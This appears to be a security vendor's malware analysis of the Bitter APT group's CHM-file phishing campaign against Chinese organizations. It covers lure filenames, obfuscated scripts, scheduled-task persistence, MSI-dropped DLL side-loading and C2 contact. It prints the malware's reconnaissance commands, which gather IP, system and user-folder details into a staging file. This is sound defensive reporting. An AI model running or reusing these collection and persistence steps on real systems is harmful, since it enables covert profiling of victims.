The Bitter (T-APT-17) group is a threat group that usually targets South Asian government organizations, using Microsoft Office programs to distribute malware such as Word or Excel. AhnLab Security Emergency response Center (ASEC) has identified multiple circumstances of the group distributing CHM malware to certain Chinese organizations. CHM files have been used by various threat groups in APT attacks since earlier this year and covered multiple times in ASEC blog posts.
The files used in the recent attack were being distributed as attachments to emails as compressed files. The compressed files contain a CHM file with the following filenames.
- Filenames used in distribution
Project Plan 2023 .chm
Urgent passport enquiry of the following officials.docx.chm
SUSPECTED FOREIGN TERRORIST FIGHTERS.chm
Forensic Evidence on Crime Scene.chm
When CHM files are executed, most generate an empty help window, but some display content related to the “United Front Work Department of the Central Committee of the Chinese Communist Party” and “Russian-Chinese Committee for Friendship, Peace and Development.”
The internal malicious script identified in such CHM files is as follows. It is difficult for users to be aware of how the malicious script operates. A common characteristic of this script is that the part of the script involving the Click method which executes the linked shortcut object is obfuscated. Unlike CHM files covered in the past, this version seems to evade static diagnosis through obfuscation.
When the script is executed, both types create a task that executes the malicious command. Each malicious command connects to their respective URL address below and executes an additional malicious file. Both of the following URLs are currently unavailable, but an MSI file presumed to have been downloaded from the first URL has been collected.
Upon execution, the MSI file generates a normal exe file and a malicious DLL file before executing the former. Generated files are shown below. When MicrosoftServices.exe is executed, OLMAPI32.dll is loaded. The loaded DLL is the malicious file created by the threat actor. The DLL Side-Loading method (T1574.002) has been used.
The features of the loaded malicious DLL are as follows. First, it collects user information through the following commands and saves it in “c:\Users\Public\cr.dat”.
- IP Info
cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com>> c:\Users\Public\cr.dat
- System Info
cmd.exe /c systeminfo>> c:\Users\Public\cr.dat
- Directory Info
cmd.exe /c dir “%userprofile%\Documents”>> c:\Users\Public\cr.dat
cmd.exe /c dir “%userprofile%\Desktop”>> c:\Users\Public\cr.dat
cmd.exe /c dir “%userprofile%\Downloads”>> c:\Users\Public\cr.dat
Afterward, a task is created to maintain persistence which executes MicrosoftServices.exe under the name “Microsoft Update.”
Additionally, it attempts to connect to the following C2 server and can perform various malicious behaviors following commands from the threat actor.
Recently there has been a rise in attacks using CHM files both in Korea and overseas, and this file format is being used for various malware. Users must carefully check the senders of emails and refrain from opening files from unknown sources. They should also perform routine PC checks and always keep their security products updated to the latest version.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.